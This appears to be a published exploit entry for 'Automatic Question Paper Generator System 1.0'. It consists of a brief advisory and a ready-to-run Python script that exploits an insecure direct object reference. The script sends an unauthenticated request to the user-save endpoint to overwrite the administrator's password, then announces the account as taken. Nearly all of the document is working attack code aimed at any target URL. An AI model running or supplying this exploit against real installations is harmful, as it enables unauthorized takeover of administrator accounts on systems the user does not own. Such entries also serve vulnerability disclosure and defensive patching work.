Automatic Question Paper Generator System version 1.0 suffers from an insecure direct object reference that allows an attacker to reset the password of other users.
233bb5192c00cb509cec2fd98ea837f5
# Exploit Title: Automatic Question Paper Generator System 1.0 - Authentication Bypass
# Date: 2022-04-03
# Exploit Author: Mr Empy
# Software Link: https://www.sourcecodester.com/php/15190/automatic-question-paper-generator-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Linux
#!/usr/bin/env python3
import requests
import random
import string
from requests_toolbelt import MultipartEncoder
from time import sleep
import argparse
def banner():
print('''
___ ____ ____ ______
/ | / __ \ / __ \/ ____/
/ /| |/ / / / / /_/ / / __
/ ___ / /_/ / / ____/ /_/ /
/_/ |_\___\_\/_/ \____/
[Automatic Question Paper Generator v1.0]
[Authentication Bypass]
''')
def main():
fields = {
'id': "1",
'firstname': 'Adminstrator',
'lastname': 'Admin',
'username': 'admin',
'password': arguments.newpassword
}
boundary = '----WebKitFormBoundary' +
''.join(random.sample(string.ascii_letters + string.digits, 16))
m = MultipartEncoder(fields=fields, boundary=boundary)
headers = {
"Connection": "keep-alive",
"Content-Type": m.content_type
}
r = requests.post(f'{arguments.url}/classes/Users.php?f=save',
headers=headers, data=m)
if '1' in r.text:
print(f'[+] Account taken successfully! Login:
admin:{arguments.newpassword}')
else:
print('[-] Not vulnerable')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-u','--url', action='store', help='Target URL (
http://target.com/aqpg/)', dest='url', required=True)
parser.add_argument('-p','--password', action='store', help='New
password', dest='newpassword', required=True)
arguments = parser.parse_args()
banner()
sleep(2)
main()